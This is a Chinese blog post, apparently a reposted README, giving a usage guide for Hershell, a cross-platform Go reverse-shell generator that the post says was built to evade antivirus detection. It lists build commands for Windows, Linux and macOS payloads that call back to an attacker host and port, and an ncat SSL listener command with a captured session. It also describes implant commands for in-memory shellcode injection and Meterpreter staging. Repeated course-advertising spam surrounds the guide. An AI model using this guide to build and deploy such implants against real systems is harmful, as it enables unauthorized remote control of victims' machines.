最全Hershell:跨平台反向Shell生成器_shell 获取 goos,一文详解

于 2024-05-13 08:06:08 发布
阅读量854 收藏 26
点赞数 24
分类专栏: 程序员 文章标签: go 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84910977/article/details/138782737
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

Hershell是一款功能强大的跨平台反向Shell生成器,该工具使用Go语言开发,基于TCP反向Shell实现其功能。

该工具使用了TLS来保障数据通讯的安全性,并且提供了证书公共密钥指纹绑定功能来防止通信数据被拦截。

支持的系统
Hershell的当前版本支持以下操作系统:
Windows
Linux
macOS
FreeBSD

开发目的
虽然Meterpreter Payload有时也能用,但是这种方法很容易被反病毒产品检测到。因此,Hershell便应运而生,它可以给我们提供一个基于TCP的反向Shell,而且能够支持各种不同的操作系统平台。

工具使用&依赖组件
Hershell使用Go语言开发,我们首先需要按照Go官方手册【点我获取】在我们的设备上完成Go环境的搭建,并设置好$GOPATH环境变量。

接下来,运行下列命令来获取项目源码:
go get github.com/lesnuages/hershell

构建Payload
在构建Payload时,我们可以选择使用已提供的Makefile来完成构建。此时,我们需要设置以下环境变量:

GOOS : 目标操作系统
GOARCH : 目标架构
LHOST : 攻击者IP或主机域名
LPORT : 监听器端口
关于GOOS和GOARCH变量的设置,可以参考这篇【文档】。
当然了,我们也在Makefile中提供了一些可供参考的变量值:
depends : 生成服务器证书(反向Shell需要使用到)

windows32 : 构建一个32位Windows可执行程序(PE 32位)
windows64 : 构建一个64位Windows可执行程序(PE 64位)
linux32 : 构建一个32位Linux可执行程序(ELF 32位)
linux64 : 构建一个64位Linux可执行程序(ELF 64位)
macos32 : 构建一个32位macOS可执行程序(Mach-O)
macos64 : 构建一个64位macOS可执行程序(Mach-O)

针对上述列表中的目标平台,我们还需要设置LHOST和LPORT这两个环境变量。

使用反向Shell
代码开始执行之后,工具将给我们提供一个远程Shell,它是一个自定义的交互式Shell,允许我们通过Windows上的cmd.exe或Unix设备中的/bin/sh来执行系统命令。

Hershell支持的部分特定命令如下表所示:
run_shell : 获取系统Shell

inject : 向相同进程内存中注入一个shellcode(Base64编码),并执行代码。
meterpreter [tcp|http|https] IP:PORT :与多个处理器建立连接并从Metasploit获取第二阶段的反向TCP、HTTP或HTTPS Meterpreter,然后在内存中执行Shellcode(该功能目前仅支持Windows平台)。

exit : 退出程序

工具使用
首先,我们需要使用下面的命令生成一个有效的证书:

$ make depends
openssl req -subj ‘/CN=yourcn.com/O=YourOrg/C=FR’ -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
…++

cat server.key >> server.pem
针对Windows平台:
#Predifined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
#Predifined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234
针对Linux平台:
#Predifined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
#Predifined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234
针对macOS平台:
$ make macos LHOST=192.168.0.12 LPORT=1234
工具使用样例
基础使用
我们可以使用各种工具来处理传入的连接,比如说:

socat
ncat
openssl服务器模块

Metasploit的各种handler (python/shell_reverse_tcp_ssl payload)

下面是ncat的使用样例:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab
Meterpreter场景
注意:目前该功能仅支持在Windows平台上使用。

该工具的Meterpreter使用场景目前仅支持下列Payload:

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

2401_84910977
关注
  • 24
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pandora:Go语言的负载生成器
05-07
潘多拉 Pandora是Go语言中的高性能负载生成器。 它具有内置的HTTP(S)和HTTP / 2支持,您可以在Go中编写自己的负载方案,然后在测试之前进行编译。如何开始二进制发行可供。从源头建造我们使用go 1.11模块。 如果在...
shellcode
赵花花08042的博客
01-28 4102
https://www.bilibili.com/video/BV1y4411k7ch/?spm_id_from=333.788.recommend_more_video.3 什么是shellcode? 通常情况下,编写代码生成pe文件(即exe文件)(运行所需的宿主 意思就是,需要先运行exe) 而shellcode,不被包装在pe中,以二进制的方式存放到 举例:实现弹窗提示功能 编译后,运行生成的exe文件,弹出框 把代码中的核心代码MassegeBOX提取出来就是shellcode 通过特殊处
CSSG:Cobalt Strike Shellcode生成工具
weixin_43977912的博客
01-24 3588
CSSG CSSG是一款功能强大的Cobalt Strike Shellcode生成工具。本质上来说,CSSG是一个具备攻击性的Python脚本,广大研究人员可以使用它来轻松生成并格式化信标Shellcode。 该工具支持生成无阶段信标Shellcode,并带有暴露的退出方法、额外的格式化、加密、编码、压缩和多行输出等功能。 注意:Shellcode的转换通常需要按菜单顺序降序执行。 执行要求 可选的AES加密选项使用/assets文件夹中的python脚本实现。 具体取决于要安装的pycryptodome
GShell:一款灵活可扩展的跨平台Shell生成器
hunanjiushen的博客
01-30 483
GShell是一款功能强大且支持灵活扩展的跨平台Shell生成器,在该工具的帮助下,广大研究人员可以随意生成针对任意平台的任何Shell,并实现完全的自动化和管理控制功能。Bind-Shel:目标需要有一个监听端口,然后我们连接到目标主机;注意:你可以添加你自己使用了其他协议的Shell,比如说DNS。Shell相关的内容存储在markdown文件中,支持随意修改。反向Shell:我们又一个监听端口,让目标连接到我们的设备;Base64/32/16编码:绕过字符串/关键字过滤器;本项目的开发与发布遵循。
搞木马免杀你必须要知道: 如何编写X86环境下的ShellCode!
xf555er的博客
08-21 2154
想要学免杀,就一定要懂得如何处理shellcode, 现在很多的木马免杀操作都是用工具来处理的, 但这仅仅能绕过一小部分杀软, 一旦杀软更新病毒库, 脚本小子们就无招可施, 本篇文章将带领大家了解shellcode的原理及制作, 会后续的Shellcode免杀打下坚实基础
Hershell跨平台反向Shell生成器
weixin_43977912的博客
04-29 271
Hershell是一款功能强大的跨平台反向Shell生成器,该工具使用Go语言开发,基于TCP反向Shell实现其功能。 该工具使用了TLS来保障数据通讯的安全性,并且提供了证书公共密钥指纹绑定功能来防止通信数据被拦截。 支持的系统 Hershell的当前版本支持以下操作系统: Windows Linux macOS FreeBSD 开发目的 虽然Meterpreter Payload有时也能用,但是这种方法很容易被反病毒产品检测到。因此,Hershell便应运而生,它可以给我们提供一个基于TCP的反向Sh
goos-infra:GOOS 示例的 OpenFire 服务器作为 docker 容器
06-01
内容GOOS 示例的 OpenFire 服务器作为 docker 容器。 管理控制台凭据是 admin:admin。 狙击手和拍卖用户已根据本书的需要创建。指示需要 Boot2Docker。 (在 build.gradle 中编辑配置以使用另一个 docker 设置)创建...
go-reactive:create-react-app + webassembly +开始! :party_popper::party_popper:
05-06
什么为什么? 您是否曾经想过使用WebAssembly和Go作为React开发人员来构建某些东西,但是在如何开始时困惑不已? 好吧,我有同样的问题。...怎么跑克隆此仓库cd进入src文件夹并运行GOOS=js GOARCH=wasm go bu
fastrand:Go的快速且可扩展的伪随机数生成器
05-04
Fastrand ...goos: linux goarch: amd64 pkg: github.com/valyala/fastrand BenchmarkUint32n 50000000 29.7 ns/op BenchmarkRNGUint32n 200000000 6.50 ns/op BenchmarkRNGUint32nWithLock 100000
go-serial:用于go-lang的跨平台串行库(基于http的自定义实现
05-09
Go的跨平台串行库。 从,现在独立开发。 许多想法来自和 。 欢迎任何PR-。 安装 在GOPATH模式下不起作用 go get -u github.com/albenik/go-serial/v2 MacOS构建需要CGO_ENABLED=1 文档和示例 在此处查看godoc: ...
托管了具有大量功能的反向Shell生成器。 -(非常适合CTF)-Linux开发
05-27
托管的具有大量功能的Reverse Shell生成器-(对于CTF来说是很棒的)reverse-shell-generator托管的具有大量功能的Reverse Shell生成器-(对于CTF是很棒的)托管实例https://revshells.com功能生成公共侦听器反向shell原始模式将cURL shell链接到您的计算机。 用于将侦听端口号增加1 URI和Base64编码的按钮LocalStorage,以保留您的配置暗模式和亮模式屏幕快照Dev如果您想修改任何服务,建议使用netlify dev命令
reverse-shell-generator:基于Web的反向shell生成器
02-05
reverse-shell-generator:基于Web的反向shell生成器
Go-shellexec这个Go提供了跨平台类似shell的命令行执行
08-14
shellexec 这个Go提供了跨平台类似shell的命令行执行
shellcode_generator:shellcode,生成器,Visual Studio,C ++,Windows
03-09
shellcode_generator shellcode,生成器,Visual Studio,C ++,Windows
WindTerm是一款开源免费、跨平台SSH/Sftp/Shell/Telnet/Serial 客户端,即远程连接工具
03-18
WindTerm是一款开源免费、跨平台SSH/Sftp/Shell/Telnet/Serial 客户端,即远程连接工具, 外网连接有时候没网,
渗透测试中的 Go 语言使用:编写反弹后门 Hershell
a13161333486的博客
05-07 2707
  介绍  在渗透测试过程中,一个必备的工具是众所周知的、超级棒的Metasploit框架。  该环境包含大量的payload、编码器和其他工具。在这些payload中Meterpreter有重要意义:它是一个经过开发和后开发命令的修改版的shell。由于其强大的攻击特性,该shell可能是最常用到的。  Meterpreter的问题  不幸的是,Meterpreter的流行有一个缺点:大多数反病...
在线生成反向shell命令
汗的博客
11-23 1633
分享一个毛子的在线工具,可以用来辅助生成反向shell,有时候可能方便点。本地测测就行了,别真把自己的vps都输给人家了 使用步骤: 输入vps的ip和端口,选择change copy对应的命令执行 链接: https://krober.biz/misc/reverse_shell.php 网站截图 ...
uuid生成器_Hershell:一款功能强大的跨平台反向Shell生成器
weixin_39844284的博客
11-21 109
Hershell是一款功能强大的跨平台反向Shell生成器,该工具使用Go语言开发,基于TCP反向Shell实现其功能。该工具使用了TLS来保障数据通讯的安全性,并且提供了证书公共密钥指纹绑定功能来防止通信数据被拦截。支持的系统Hershell的当前版本支持以下操作系统:WindowsLinuxmacOSFreeBSD开发目的虽然Meterpreter Payload有时也能用,但是这种...
在 Windows 上使用 Go 命令构建可执行文件,命令为: 复制 CGO_ENABLED=1 GOOS=linux GOARCH=amd64 CC=x86_64-linux-gnu-gcc go build -o [可执行文件名] [代码路径] 如何操作
最新发布
06-07
set GOOS=linux set GOARCH=amd64 ``` 5. 设置目标平台的编译器 设置目标平台的编译器为 GCC 编译器。 ``` set CC=x86_64-linux-gnu-gcc ``` 6. 构建可执行文件 使用 `go build` 命令构建可执行文件,命令为: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值